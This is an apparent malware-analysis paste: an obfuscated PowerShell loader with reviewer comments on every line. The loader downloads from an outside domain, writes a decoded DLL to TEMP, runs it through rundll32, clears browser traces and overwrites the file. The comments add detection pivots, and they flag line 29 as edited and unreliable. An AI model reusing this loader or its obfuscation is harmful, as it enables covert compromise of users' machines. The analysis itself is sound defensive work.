
Untitled

a guest Jul 17th, 2019 87 Never
  # Analyst note: every command in this script is invoked by passing its name as a string to the
  # call (&) or dot (.) operator, so cmdlet names never appear as bare tokens.
  # 'sal' is the built-in alias for Set-Alias: YY becomes an alias for New-Object.
  1. &('sal') ('YY') ('nEw-OBjEcT')
  # MU becomes an alias for iex (Invoke-Expression). Neither YY nor MU is referenced again in the lines shown here.
  2. &('sal') ('MU') ('ieX')
  3.  
  # $Nw is set to 4 and is not read again in the visible script; it looks like filler.
  4. ${Nw}=2*2
  # Zs -> Get-Date (used further down to build the URL query string).
  5. .("sal") ('Zs') ("Get-Date")
  # Qq -> rundll32 (used further down to run the dropped file).
  6. .("sal") ('Qq') ("rundll32")
  # Calls Get-Counter and keeps the result in $tA, which is not read again in the visible lines.
  # NOTE(review): purpose unclear from this listing; possibly filler or a delay. Confirm in a sandbox trace.
  7. ${tA}=.("Get-Counter")
  8.  
  9.  
  # $Ii holds the download URL (defanged for reports: hxxps://woeiuyfgowe[.]xyz/image.php).
  # Inside ${...} the backtick is an escape character and PowerShell variable names are case-insensitive,
  # so ${I`i}, ${iI} and ${ii} all name the same variable.
  10. ${I`i}=('https://woeiuyfgowe.xyz/image.php')
  # Appends "?" plus the first 27 characters of Get-Date -Format o (the round-trip timestamp, cut before
  # the time-zone suffix), so each request carries a per-run query string.
  11. ${iI}="${ii}?"+(.('Zs') -Format ('o')).('substring').Invoke(0,27)
  # $ez holds the type name Net.WebClient as a plain string; it is only instantiated indirectly further down.
  12. ${e`z}=('Net.WebClient')
  # rR: string-substitution decoder. It builds a three-entry hashtable (line break -> 'T', '_' -> 'V',
  # '-' -> 'A') and applies each entry to its string argument with String.Replace, then returns the result.
  # The first key is a quoted string that spans two lines of the listing, i.e. the key is the line-break
  # character(s) itself.
  # ${t`EE} and ${T`eE} resolve to the same variable, so the replacements accumulate across loop iterations.
  # Further down, the output of rR is stripped of spaces and Base64-decoded, so this step appears to restore
  # characters that were swapped out of a Base64 blob; a plain Base64 signature would not match the raw text.
  13. function r`R([string] ${t`EE}){${l} = @{}
  14.  ${L}.'
  15. ' = 'T'
  16.  ${l}.'_' = 'V'
  17.  ${l}.'-' = 'A'
  18.  Foreach(${e} in ${L}."kE`ys"){${T`eE} = ${t`EE}.('Replace').Invoke(${E}, ${L}.${e})}return ${T`Ee}}
  # Stores the URL (with its timestamp query) in a variable named 43U and the type-name string in 4H, so the
  # following lines can fetch them through the Variable: drive instead of by direct reference.
  19. &('Set-Variable') ('43U') ${Ii}
  20. .('Set-Variable') ('4H') ${Ez}
  # Runs dir against 'ect*' in the current location; the output is not captured. NOTE(review): looks like filler.
  21. &('dir') ('ect*')
  # Reviewer reading of the next line (confirm against script block logging or a debugger):
  #   - Variable:/E*onte* wildcard-matches $ExecutionContext; entry [6] of its Get-Member output is
  #     presumably InvokeCommand.
  #   - 'Variable:X6r_' with 'X6r' (chars 88,54,114) replaced by [char]92 is Variable:\_, i.e. the pipeline
  #     variable $_; the filter -like '*nd*e' presumably selects the GetCommandName method.
  #   - That method is invoked with 'N*ct', which presumably expands to New-Object; GetCmdlet returns the
  #     cmdlet, and it is called with the value of 4H.
  #   Net effect: wm = a new Net.WebClient object, with neither New-Object nor the type written as a token.
  22. .('Set-Variable') ('wm') (&(&('GI') ('Variable:/E*onte*'))."V`ALUe".(((.('GI') ('Variable:/E*onte*'))."vAl`UE"|&('Member'))[6]."nA`Me").('GetCmdlet').Invoke((.('GI') ('Variable:/E*onte*'))."val`UE".(((&('GI') ('Variable:/E*onte*'))."V`AlUe"|&('Member'))[6]."n`AMe").(((&('GI') ('Variable:/E*onte*'))."vAL`UE".(((.('GI') ('Variable:/E*onte*'))."v`ALuE"|.('Member'))[6]."N`AmE")."P`so`BjeCT"."m`eThODS"|.('?'){(.('DIR') (('Variable:X6r_') -Replace  ([ChaR]88+[ChaR]54+[ChaR]114),[ChaR]92))."V`AluE"."nA`mE"-like('*nd*e')})."n`Ame")."Invo`kE"(('N*ct'),1,${T`Rue}))(&('Variable') ('4H'))."VA`LUe")
  # Gu = the name of the member of wm that matches '*wn*g' (presumably DownloadString). 'Z1m' is again
  # swapped for a backslash to reach $_.
  23. &('Set-Variable') ('Gu') ((((.('GCi') ('Variable:wm'))."V`Alue"|.('Member'))|.('?'){(&('DIR') (('Variable:Z1m_') -RePlacE'Z1m',[ChAr]92))."V`AluE"."Na`me"-like('*wn*g')})."N`AMe")
  # 'JhR' (chars 74,104,82) is replaced by a backslash to give Variable:\Gu; the member named there is invoked
  # on wm with the 43U URL and the response is stored in $Ly.
  # NOTE(review): $Ly is not read again in the visible lines.
  24. ${Ly}=(&('gCi') ('Variable:wm'))."vA`LUe".((&('GCi') ('Variable:JhRGu')."r`e`plAce"(([cHar]74+[cHar]104+[cHar]82),[StRinG][cHar]92))."VAl`Ue")."iNV`okE"((&('GCI') ('Variable:/43U'))."val`UE")
  # $gA = the current user's TEMP directory.
  25. ${gA}=${EN`V:T`eMp}
  # Picks a random existing item in TEMP (kept in $D) and takes its name minus the last four characters,
  # so the dropped file borrows the base name of something already present.
  26. ${G`g}=(${D} = &('gci') ${g`A}|&('get-random'))."n`AMe" -replace ".{4}$"
  # $WY = <TEMP>\<borrowed name>.   (trailing dot, no extension)
  27. ${WY}=${GA}+'\'+${gg}+'.'
  # $eT is assigned and not read again in the visible lines.
  28. ${eT} = 1234
  # NOTE(review): as pasted, the right-hand side is not a quoted string, and $NY (not the downloaded text
  # in $Ly) is what the next line decodes. This listing looks edited after capture; do not assume it runs
  # as shown, and prefer the original sample or script block logs for analysis.
  29. ${N`Y} = $env:temp\\213.dll
  # Passes $NY through rR, strips spaces, Base64-decodes the result and writes the bytes to $WY.
  30. [io.file]::"wr`IteAL`lB`YtES"(${w`Y},[Convert]::('FromBase64String').Invoke((.('RR')(${N`y})).('replace').Invoke(' ','')))
  31.  
  # Pause for 9 seconds.
  32. .('sleep') 9
  # Two rundll32 invocations joined by a pipe (Qq is the rundll32 alias set earlier).
  #   First:  InetCpl.cpl,ClearMyTracksByProcess with flag value 260, an Internet Explorer browsing-data
  #           cleanup entry point.
  #   Second: loads the file at $WY and calls its DllRegisterServer export.
  # Detection pivot: a PowerShell host spawning rundll32 against an extensionless file under TEMP with
  # DllRegisterServer, and ClearMyTracksByProcess launched from a script rather than by the user.
  33. &('Qq') ('InetCpl.cpl'),('ClearMyTracksByProcess') 260|&('Qq') ('/s') ${w`Y}, ('DllRegisterServer')
  # Pause for 55 seconds.
  34. &('sleep') 55
  # 'sl' is the Set-Location alias, called here with no arguments; appears to be filler.
  35. .('sl')
  # '2hmd' with '2hm' (chars 50,104,109) replaced by a backslash is the regex \d. Every digit in $NY is
  # replaced with '.', and the result is written over the dropped file at $WY. Forensic caveat: after this
  # line the file on disk no longer contains the bytes that were loaded, so hash it from memory, from EDR
  # file-write telemetry, or from a sandbox capture taken before this step.
  36. [io.file]::"WRI`TEaLl`LiN`ES"(${w`y},[regex]::('replace').Invoke(${NY},(('2hmd')  -RepLAcE ([CHar]50+[CHar]104+[CHar]109),[CHar]92),'.'))